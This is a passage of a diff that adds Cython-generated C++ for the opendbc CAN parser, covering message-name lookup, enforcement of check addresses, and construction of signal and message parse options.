__PYX_ERR(0, 77, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + if (unlikely(__pyx_t_17)) { + + /* "opendbc/can/parser_pyx.pyx":78 + * if not isinstance(c[0], numbers.Number): + * if c[0] not in msg_name_to_address: + * print(msg_name_to_address) # <<<<<<<<<<<<<< + * raise RuntimeError(f"could not find message {repr(c[0])} in DBC {self.dbc_name}") + * c = (msg_name_to_address[c[0]], c[1]) + */ + __pyx_t_4 = __Pyx_PyObject_CallOneArg(__pyx_builtin_print, __pyx_v_msg_name_to_address); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 78, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + + /* "opendbc/can/parser_pyx.pyx":79 + * if c[0] not in msg_name_to_address: + * print(msg_name_to_address) + * raise RuntimeError(f"could not find message {repr(c[0])} in DBC {self.dbc_name}") # <<<<<<<<<<<<<< + * c = (msg_name_to_address[c[0]], c[1]) + * checks[i] = c + */ + __pyx_t_4 = PyTuple_New(4); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 79, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_15 = 0; + __pyx_t_16 = 127; + __Pyx_INCREF(__pyx_kp_u_could_not_find_message); + __pyx_t_15 += 23; + __Pyx_GIVEREF(__pyx_kp_u_could_not_find_message); + PyTuple_SET_ITEM(__pyx_t_4, 0, __pyx_kp_u_could_not_find_message); + __pyx_t_2 = __Pyx_GetItemInt(__pyx_v_c, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 79, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_11 = PyObject_Repr(__pyx_t_2); if (unlikely(!__pyx_t_11)) __PYX_ERR(0, 79, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_11); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_2 = __Pyx_PyObject_FormatSimple(__pyx_t_11, __pyx_empty_unicode); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 79, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_11); __pyx_t_11 = 0; + __pyx_t_16 = (__Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_2) > __pyx_t_16) ? __Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_2) : __pyx_t_16; + __pyx_t_15 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_2); + __Pyx_GIVEREF(__pyx_t_2); + PyTuple_SET_ITEM(__pyx_t_4, 1, __pyx_t_2); + __pyx_t_2 = 0; + __Pyx_INCREF(__pyx_kp_u_in_DBC); + __pyx_t_15 += 8; + __Pyx_GIVEREF(__pyx_kp_u_in_DBC); + PyTuple_SET_ITEM(__pyx_t_4, 2, __pyx_kp_u_in_DBC); + __pyx_t_2 = __pyx_convert_PyBytes_string_to_py_std__in_string(__pyx_cur_scope->__pyx_v_self->dbc_name); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 79, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_11 = __Pyx_PyObject_FormatSimple(__pyx_t_2, __pyx_empty_unicode); if (unlikely(!__pyx_t_11)) __PYX_ERR(0, 79, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_11); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_16 = (__Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_11) > __pyx_t_16) ? __Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_11) : __pyx_t_16; + __pyx_t_15 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_11); + __Pyx_GIVEREF(__pyx_t_11); + PyTuple_SET_ITEM(__pyx_t_4, 3, __pyx_t_11); + __pyx_t_11 = 0; + __pyx_t_11 = __Pyx_PyUnicode_Join(__pyx_t_4, 4, __pyx_t_15, __pyx_t_16); if (unlikely(!__pyx_t_11)) __PYX_ERR(0, 79, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_11); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_t_4 = __Pyx_PyObject_CallOneArg(__pyx_builtin_RuntimeError, __pyx_t_11); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 79, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_11); __pyx_t_11 = 0; + __Pyx_Raise(__pyx_t_4, 0, 0, 0); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __PYX_ERR(0, 79, __pyx_L1_error) + + /* "opendbc/can/parser_pyx.pyx":77 + * c = checks[i] + * if not isinstance(c[0], numbers.Number): + * if c[0] not in msg_name_to_address: # <<<<<<<<<<<<<< + * print(msg_name_to_address) + * raise RuntimeError(f"could not find message {repr(c[0])} in DBC {self.dbc_name}") + */ + } + + /* "opendbc/can/parser_pyx.pyx":80 + * print(msg_name_to_address) + * raise RuntimeError(f"could not find message {repr(c[0])} in DBC {self.dbc_name}") + * c = (msg_name_to_address[c[0]], c[1]) # <<<<<<<<<<<<<< + * checks[i] = c + * + */ + __pyx_t_4 = __Pyx_GetItemInt(__pyx_v_c, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 80, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_11 = __Pyx_PyDict_GetItem(__pyx_v_msg_name_to_address, __pyx_t_4); if (unlikely(!__pyx_t_11)) __PYX_ERR(0, 80, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_11); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_t_4 = __Pyx_GetItemInt(__pyx_v_c, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 80, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_2 = PyTuple_New(2); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 80, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_GIVEREF(__pyx_t_11); + PyTuple_SET_ITEM(__pyx_t_2, 0, __pyx_t_11); + __Pyx_GIVEREF(__pyx_t_4); + PyTuple_SET_ITEM(__pyx_t_2, 1, __pyx_t_4); + __pyx_t_11 = 0; + __pyx_t_4 = 0; + __Pyx_DECREF_SET(__pyx_v_c, __pyx_t_2); + __pyx_t_2 = 0; + + /* "opendbc/can/parser_pyx.pyx":81 + * raise RuntimeError(f"could not find message {repr(c[0])} in DBC {self.dbc_name}") + * c = (msg_name_to_address[c[0]], c[1]) + * checks[i] = c # <<<<<<<<<<<<<< + * + * if enforce_checks: + */ + if (unlikely((__Pyx_SetItemInt(__pyx_v_checks, __pyx_v_i, __pyx_v_c, std::vector ::size_type, 0, __Pyx_PyInt_FromSize_t, 0, 0, 1) < 0))) __PYX_ERR(0, 81, __pyx_L1_error) + + /* "opendbc/can/parser_pyx.pyx":76 + * for i in range(len(checks)): + * c = checks[i] + * if not isinstance(c[0], numbers.Number): # <<<<<<<<<<<<<< + * if c[0] not in msg_name_to_address: + * print(msg_name_to_address) + */ + } + } + + /* "opendbc/can/parser_pyx.pyx":83 + * checks[i] = c + * + * if enforce_checks: # <<<<<<<<<<<<<< + * checked_addrs = {c[0] for c in checks} + * signal_addrs = {s[1] for s in signals} + */ + __pyx_t_17 = __Pyx_PyObject_IsTrue(__pyx_v_enforce_checks); if (unlikely((__pyx_t_17 < 0))) __PYX_ERR(0, 83, __pyx_L1_error) + if (__pyx_t_17) { + + /* "opendbc/can/parser_pyx.pyx":84 + * + * if enforce_checks: + * checked_addrs = {c[0] for c in checks} # <<<<<<<<<<<<<< + * signal_addrs = {s[1] for s in signals} + * unchecked = signal_addrs - checked_addrs + */ + { /* enter inner scope */ + __pyx_t_2 = PySet_New(NULL); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 84, __pyx_L21_error) + __Pyx_GOTREF(__pyx_t_2); + if (likely(PyList_CheckExact(__pyx_v_checks)) || PyTuple_CheckExact(__pyx_v_checks)) { + __pyx_t_4 = __pyx_v_checks; __Pyx_INCREF(__pyx_t_4); __pyx_t_13 = 0; + __pyx_t_18 = NULL; + } else { + __pyx_t_13 = -1; __pyx_t_4 = PyObject_GetIter(__pyx_v_checks); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 84, __pyx_L21_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_18 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_4); if (unlikely(!__pyx_t_18)) __PYX_ERR(0, 84, __pyx_L21_error) + } + for (;;) { + if (likely(!__pyx_t_18)) { + if (likely(PyList_CheckExact(__pyx_t_4))) { + if (__pyx_t_13 >= PyList_GET_SIZE(__pyx_t_4)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_11 = PyList_GET_ITEM(__pyx_t_4, __pyx_t_13); __Pyx_INCREF(__pyx_t_11); __pyx_t_13++; if (unlikely((0 < 0))) __PYX_ERR(0, 84, __pyx_L21_error) + #else + __pyx_t_11 = PySequence_ITEM(__pyx_t_4, __pyx_t_13); __pyx_t_13++; if (unlikely(!__pyx_t_11)) __PYX_ERR(0, 84, __pyx_L21_error) + __Pyx_GOTREF(__pyx_t_11); + #endif + } else { + if (__pyx_t_13 >= PyTuple_GET_SIZE(__pyx_t_4)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_11 = PyTuple_GET_ITEM(__pyx_t_4, __pyx_t_13); __Pyx_INCREF(__pyx_t_11); __pyx_t_13++; if (unlikely((0 < 0))) __PYX_ERR(0, 84, __pyx_L21_error) + #else + __pyx_t_11 = PySequence_ITEM(__pyx_t_4, __pyx_t_13); __pyx_t_13++; if (unlikely(!__pyx_t_11)) __PYX_ERR(0, 84, __pyx_L21_error) + __Pyx_GOTREF(__pyx_t_11); + #endif + } + } else { + __pyx_t_11 = __pyx_t_18(__pyx_t_4); + if (unlikely(!__pyx_t_11)) { + PyObject* exc_type = PyErr_Occurred(); + if (exc_type) { + if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); + else __PYX_ERR(0, 84, __pyx_L21_error) + } + break; + } + __Pyx_GOTREF(__pyx_t_11); + } + __Pyx_XDECREF_SET(__pyx_7genexpr__pyx_v_c, __pyx_t_11); + __pyx_t_11 = 0; + __pyx_t_11 = __Pyx_GetItemInt(__pyx_7genexpr__pyx_v_c, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_11)) __PYX_ERR(0, 84, __pyx_L21_error) + __Pyx_GOTREF(__pyx_t_11); + if (unlikely(PySet_Add(__pyx_t_2, (PyObject*)__pyx_t_11))) __PYX_ERR(0, 84, __pyx_L21_error) + __Pyx_DECREF(__pyx_t_11); __pyx_t_11 = 0; + } + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_XDECREF(__pyx_7genexpr__pyx_v_c); __pyx_7genexpr__pyx_v_c = 0; + goto __pyx_L25_exit_scope; + __pyx_L21_error:; + __Pyx_XDECREF(__pyx_7genexpr__pyx_v_c); __pyx_7genexpr__pyx_v_c = 0; + goto __pyx_L1_error; + __pyx_L25_exit_scope:; + } /* exit inner scope */ + __pyx_v_checked_addrs = ((PyObject*)__pyx_t_2); + __pyx_t_2 = 0; + + /* "opendbc/can/parser_pyx.pyx":85 + * if enforce_checks: + * checked_addrs = {c[0] for c in checks} + * signal_addrs = {s[1] for s in signals} # <<<<<<<<<<<<<< + * unchecked = signal_addrs - checked_addrs + * if len(unchecked): + */ + { /* enter inner scope */ + __pyx_t_2 = PySet_New(NULL); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 85, __pyx_L28_error) + __Pyx_GOTREF(__pyx_t_2); + if (likely(PyList_CheckExact(__pyx_v_signals)) || PyTuple_CheckExact(__pyx_v_signals)) { + __pyx_t_4 = __pyx_v_signals; __Pyx_INCREF(__pyx_t_4); __pyx_t_13 = 0; + __pyx_t_18 = NULL; + } else { + __pyx_t_13 = -1; __pyx_t_4 = PyObject_GetIter(__pyx_v_signals); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 85, __pyx_L28_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_18 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_4); if (unlikely(!__pyx_t_18)) __PYX_ERR(0, 85, __pyx_L28_error) + } + for (;;) { + if (likely(!__pyx_t_18)) { + if (likely(PyList_CheckExact(__pyx_t_4))) { + if (__pyx_t_13 >= PyList_GET_SIZE(__pyx_t_4)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_11 = PyList_GET_ITEM(__pyx_t_4, __pyx_t_13); __Pyx_INCREF(__pyx_t_11); __pyx_t_13++; if (unlikely((0 < 0))) __PYX_ERR(0, 85, __pyx_L28_error) + #else + __pyx_t_11 = PySequence_ITEM(__pyx_t_4, __pyx_t_13); __pyx_t_13++; if (unlikely(!__pyx_t_11)) __PYX_ERR(0, 85, __pyx_L28_error) + __Pyx_GOTREF(__pyx_t_11); + #endif + } else { + if (__pyx_t_13 >= PyTuple_GET_SIZE(__pyx_t_4)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_11 = PyTuple_GET_ITEM(__pyx_t_4, __pyx_t_13); __Pyx_INCREF(__pyx_t_11); __pyx_t_13++; if (unlikely((0 < 0))) __PYX_ERR(0, 85, __pyx_L28_error) + #else + __pyx_t_11 = PySequence_ITEM(__pyx_t_4, __pyx_t_13); __pyx_t_13++; if (unlikely(!__pyx_t_11)) __PYX_ERR(0, 85, __pyx_L28_error) + __Pyx_GOTREF(__pyx_t_11); + #endif + } + } else { + __pyx_t_11 = __pyx_t_18(__pyx_t_4); + if (unlikely(!__pyx_t_11)) { + PyObject* exc_type = PyErr_Occurred(); + if (exc_type) { + if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); + else __PYX_ERR(0, 85, __pyx_L28_error) + } + break; + } + __Pyx_GOTREF(__pyx_t_11); + } + __Pyx_XDECREF_SET(__pyx_8genexpr1__pyx_v_s, __pyx_t_11); + __pyx_t_11 = 0; + __pyx_t_11 = __Pyx_GetItemInt(__pyx_8genexpr1__pyx_v_s, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_11)) __PYX_ERR(0, 85, __pyx_L28_error) + __Pyx_GOTREF(__pyx_t_11); + if (unlikely(PySet_Add(__pyx_t_2, (PyObject*)__pyx_t_11))) __PYX_ERR(0, 85, __pyx_L28_error) + __Pyx_DECREF(__pyx_t_11); __pyx_t_11 = 0; + } + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_XDECREF(__pyx_8genexpr1__pyx_v_s); __pyx_8genexpr1__pyx_v_s = 0; + goto __pyx_L32_exit_scope; + __pyx_L28_error:; + __Pyx_XDECREF(__pyx_8genexpr1__pyx_v_s); __pyx_8genexpr1__pyx_v_s = 0; + goto __pyx_L1_error; + __pyx_L32_exit_scope:; + } /* exit inner scope */ + __pyx_v_signal_addrs = ((PyObject*)__pyx_t_2); + __pyx_t_2 = 0; + + /* "opendbc/can/parser_pyx.pyx":86 + * checked_addrs = {c[0] for c in checks} + * signal_addrs = {s[1] for s in signals} + * unchecked = signal_addrs - checked_addrs # <<<<<<<<<<<<<< + * if len(unchecked): + * err_msg = ", ".join(f"{self.address_to_msg_name[addr].decode()} ({hex(addr)})" for addr in unchecked) + */ + __pyx_t_2 = PyNumber_Subtract(__pyx_v_signal_addrs, __pyx_v_checked_addrs); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 86, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_v_unchecked = __pyx_t_2; + __pyx_t_2 = 0; + + /* "opendbc/can/parser_pyx.pyx":87 + * signal_addrs = {s[1] for s in signals} + * unchecked = signal_addrs - checked_addrs + * if len(unchecked): # <<<<<<<<<<<<<< + * err_msg = ", ".join(f"{self.address_to_msg_name[addr].decode()} ({hex(addr)})" for addr in unchecked) + * raise RuntimeError(f"Unchecked addrs: {err_msg}") + */ + __pyx_t_13 = PyObject_Length(__pyx_v_unchecked); if (unlikely(__pyx_t_13 == ((Py_ssize_t)-1))) __PYX_ERR(0, 87, __pyx_L1_error) + __pyx_t_17 = (__pyx_t_13 != 0); + if (unlikely(__pyx_t_17)) { + + /* "opendbc/can/parser_pyx.pyx":88 + * unchecked = signal_addrs - checked_addrs + * if len(unchecked): + * err_msg = ", ".join(f"{self.address_to_msg_name[addr].decode()} ({hex(addr)})" for addr in unchecked) # <<<<<<<<<<<<<< + * raise RuntimeError(f"Unchecked addrs: {err_msg}") + * + */ + __pyx_t_2 = __pyx_pf_7opendbc_3can_10parser_pyx_9CANParser_8__init___genexpr(((PyObject*)__pyx_cur_scope), __pyx_v_unchecked); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 88, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_4 = __Pyx_Generator_Next(__pyx_t_2); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 88, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_2 = PyUnicode_Join(__pyx_kp_u__3, __pyx_t_4); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 88, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_v_err_msg = ((PyObject*)__pyx_t_2); + __pyx_t_2 = 0; + + /* "opendbc/can/parser_pyx.pyx":89 + * if len(unchecked): + * err_msg = ", ".join(f"{self.address_to_msg_name[addr].decode()} ({hex(addr)})" for addr in unchecked) + * raise RuntimeError(f"Unchecked addrs: {err_msg}") # <<<<<<<<<<<<<< + * + * cdef vector[SignalParseOptions] signal_options_v + */ + __pyx_t_2 = __Pyx_PyUnicode_Unicode(__pyx_v_err_msg); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 89, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_4 = __Pyx_PyUnicode_Concat(__pyx_kp_u_Unchecked_addrs, __pyx_t_2); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 89, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_2 = __Pyx_PyObject_CallOneArg(__pyx_builtin_RuntimeError, __pyx_t_4); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 89, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_Raise(__pyx_t_2, 0, 0, 0); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __PYX_ERR(0, 89, __pyx_L1_error) + + /* "opendbc/can/parser_pyx.pyx":87 + * signal_addrs = {s[1] for s in signals} + * unchecked = signal_addrs - checked_addrs + * if len(unchecked): # <<<<<<<<<<<<<< + * err_msg = ", ".join(f"{self.address_to_msg_name[addr].decode()} ({hex(addr)})" for addr in unchecked) + * raise RuntimeError(f"Unchecked addrs: {err_msg}") + */ + } + + /* "opendbc/can/parser_pyx.pyx":83 + * checks[i] = c + * + * if enforce_checks: # <<<<<<<<<<<<<< + * checked_addrs = {c[0] for c in checks} + * signal_addrs = {s[1] for s in signals} + */ + } + + /* "opendbc/can/parser_pyx.pyx":93 + * cdef vector[SignalParseOptions] signal_options_v + * cdef SignalParseOptions spo + * for sig_name, sig_address in signals: # <<<<<<<<<<<<<< + * spo.address = sig_address + * spo.name = sig_name + */ + if (likely(PyList_CheckExact(__pyx_v_signals)) || PyTuple_CheckExact(__pyx_v_signals)) { + __pyx_t_2 = __pyx_v_signals; __Pyx_INCREF(__pyx_t_2); __pyx_t_13 = 0; + __pyx_t_18 = NULL; + } else { + __pyx_t_13 = -1; __pyx_t_2 = PyObject_GetIter(__pyx_v_signals); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 93, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_18 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_2); if (unlikely(!__pyx_t_18)) __PYX_ERR(0, 93, __pyx_L1_error) + } + for (;;) { + if (likely(!__pyx_t_18)) { + if (likely(PyList_CheckExact(__pyx_t_2))) { + if (__pyx_t_13 >= PyList_GET_SIZE(__pyx_t_2)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_4 = PyList_GET_ITEM(__pyx_t_2, __pyx_t_13); __Pyx_INCREF(__pyx_t_4); __pyx_t_13++; if (unlikely((0 < 0))) __PYX_ERR(0, 93, __pyx_L1_error) + #else + __pyx_t_4 = PySequence_ITEM(__pyx_t_2, __pyx_t_13); __pyx_t_13++; if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 93, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + #endif + } else { + if (__pyx_t_13 >= PyTuple_GET_SIZE(__pyx_t_2)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_4 = PyTuple_GET_ITEM(__pyx_t_2, __pyx_t_13); __Pyx_INCREF(__pyx_t_4); __pyx_t_13++; if (unlikely((0 < 0))) __PYX_ERR(0, 93, __pyx_L1_error) + #else + __pyx_t_4 = PySequence_ITEM(__pyx_t_2, __pyx_t_13); __pyx_t_13++; if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 93, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + #endif + } + } else { + __pyx_t_4 = __pyx_t_18(__pyx_t_2); + if (unlikely(!__pyx_t_4)) { + PyObject* exc_type = PyErr_Occurred(); + if (exc_type) { + if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); + else __PYX_ERR(0, 93, __pyx_L1_error) + } + break; + } + __Pyx_GOTREF(__pyx_t_4); + } + if ((likely(PyTuple_CheckExact(__pyx_t_4))) || (PyList_CheckExact(__pyx_t_4))) { + PyObject* sequence = __pyx_t_4; + Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); + if (unlikely(size != 2)) { + if (size > 2) __Pyx_RaiseTooManyValuesError(2); + else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); + __PYX_ERR(0, 93, __pyx_L1_error) + } + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + if (likely(PyTuple_CheckExact(sequence))) { + __pyx_t_11 = PyTuple_GET_ITEM(sequence, 0); + __pyx_t_10 = PyTuple_GET_ITEM(sequence, 1); + } else { + __pyx_t_11 = PyList_GET_ITEM(sequence, 0); + __pyx_t_10 = PyList_GET_ITEM(sequence, 1); + } + __Pyx_INCREF(__pyx_t_11); + __Pyx_INCREF(__pyx_t_10); + #else + __pyx_t_11 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_11)) __PYX_ERR(0, 93, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_11); + __pyx_t_10 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_10)) __PYX_ERR(0, 93, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_10); + #endif + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + } else { + Py_ssize_t index = -1; + __pyx_t_19 = PyObject_GetIter(__pyx_t_4); if (unlikely(!__pyx_t_19)) __PYX_ERR(0, 93, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_19); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_t_20 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_19); + index = 0; __pyx_t_11 = __pyx_t_20(__pyx_t_19); if (unlikely(!__pyx_t_11)) goto __pyx_L36_unpacking_failed; + __Pyx_GOTREF(__pyx_t_11); + index = 1; __pyx_t_10 = __pyx_t_20(__pyx_t_19); if (unlikely(!__pyx_t_10)) goto __pyx_L36_unpacking_failed; + __Pyx_GOTREF(__pyx_t_10); + if (__Pyx_IternextUnpackEndCheck(__pyx_t_20(__pyx_t_19), 2) < 0) __PYX_ERR(0, 93, __pyx_L1_error) + __pyx_t_20 = NULL; + __Pyx_DECREF(__pyx_t_19); __pyx_t_19 = 0; + goto __pyx_L37_unpacking_done; + __pyx_L36_unpacking_failed:; + __Pyx_DECREF(__pyx_t_19); __pyx_t_19 = 0; + __pyx_t_20 = NULL; + if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); + __PYX_ERR(0, 93, __pyx_L1_error) + __pyx_L37_unpacking_done:; + } + __Pyx_XDECREF_SET(__pyx_v_sig_name, __pyx_t_11); + __pyx_t_11 = 0; + __Pyx_XDECREF_SET(__pyx_v_sig_address, __pyx_t_10); + __pyx_t_10 = 0; + + /* "opendbc/can/parser_pyx.pyx":94 + * cdef SignalParseOptions spo + * for sig_name, sig_address in signals: + * spo.address = sig_address # <<<<<<<<<<<<<< + * spo.name = sig_name + * signal_options_v.push_back(spo) + */ + __pyx_t_21 = __Pyx_PyInt_As_uint32_t(__pyx_v_sig_address); if (unlikely((__pyx_t_21 == ((uint32_t)-1)) && PyErr_Occurred())) __PYX_ERR(0, 94, __pyx_L1_error) + __pyx_v_spo.address = __pyx_t_21; + + /* "opendbc/can/parser_pyx.pyx":95 + * for sig_name, sig_address in signals: + * spo.address = sig_address + * spo.name = sig_name # <<<<<<<<<<<<<< + * signal_options_v.push_back(spo) + * + */ + __pyx_t_3 = __pyx_convert_string_from_py_std__in_string(__pyx_v_sig_name); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 95, __pyx_L1_error) + __pyx_v_spo.name = __PYX_STD_MOVE_IF_SUPPORTED(__pyx_t_3); + + /* "opendbc/can/parser_pyx.pyx":96 + * spo.address = sig_address + * spo.name = sig_name + * signal_options_v.push_back(spo) # <<<<<<<<<<<<<< + * + * message_options = dict((address, 0) for _, address in signals) + */ + try { + __pyx_v_signal_options_v.push_back(__pyx_v_spo); + } catch(...) { + __Pyx_CppExn2PyErr(); + __PYX_ERR(0, 96, __pyx_L1_error) + } + + /* "opendbc/can/parser_pyx.pyx":93 + * cdef vector[SignalParseOptions] signal_options_v + * cdef SignalParseOptions spo + * for sig_name, sig_address in signals: # <<<<<<<<<<<<<< + * spo.address = sig_address + * spo.name = sig_name + */ + } + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "opendbc/can/parser_pyx.pyx":98 + * signal_options_v.push_back(spo) + * + * message_options = dict((address, 0) for _, address in signals) # <<<<<<<<<<<<<< + * message_options.update(dict(checks)) + * + */ + __pyx_t_2 = __pyx_pf_7opendbc_3can_10parser_pyx_9CANParser_8__init___3genexpr(NULL, __pyx_v_signals); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 98, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_4 = __Pyx_Generator_Next(__pyx_t_2); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 98, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_v_message_options = ((PyObject*)__pyx_t_4); + __pyx_t_4 = 0; + + /* "opendbc/can/parser_pyx.pyx":99 + * + * message_options = dict((address, 0) for _, address in signals) + * message_options.update(dict(checks)) # <<<<<<<<<<<<<< + * + * cdef vector[MessageParseOptions] message_options_v + */ + __pyx_t_4 = __Pyx_PyObject_CallOneArg(((PyObject *)(&PyDict_Type)), __pyx_v_checks); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 99, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_2 = __Pyx_CallUnboundCMethod1(&__pyx_umethod_PyDict_Type_update, __pyx_v_message_options, __pyx_t_4); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 99, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "opendbc/can/parser_pyx.pyx":103 + * cdef vector[MessageParseOptions] message_options_v + * cdef MessageParseOptions mpo + * for msg_address, freq in message_options.items(): # <<<<<<<<<<<<<< + * mpo.address = msg_address + * mpo.check_frequency = freq + */ + __pyx_t_13 = 0; + if (unlikely(__pyx_v_message_options == Py_None)) { + PyErr_Format(PyExc_AttributeError, "'NoneType' object has no attribute '%.30s'", "items"); + __PYX_ERR(0, 103, __pyx_L1_error) + } + __pyx_t_4 = __Pyx_dict_iterator(__pyx_v_message_options, 1, __pyx_n_s_items, (&__pyx_t_14), (&__pyx_t_12)); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 103, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_2); + __pyx_t_2 = __pyx_t_4; + __pyx_t_4 = 0; + while (1) { + __pyx_t_22 = __Pyx_dict_iter_next(__pyx_t_2, __pyx_t_14, &__pyx_t_13, &__pyx_t_4, &__pyx_t_10, NULL, __pyx_t_12); + if 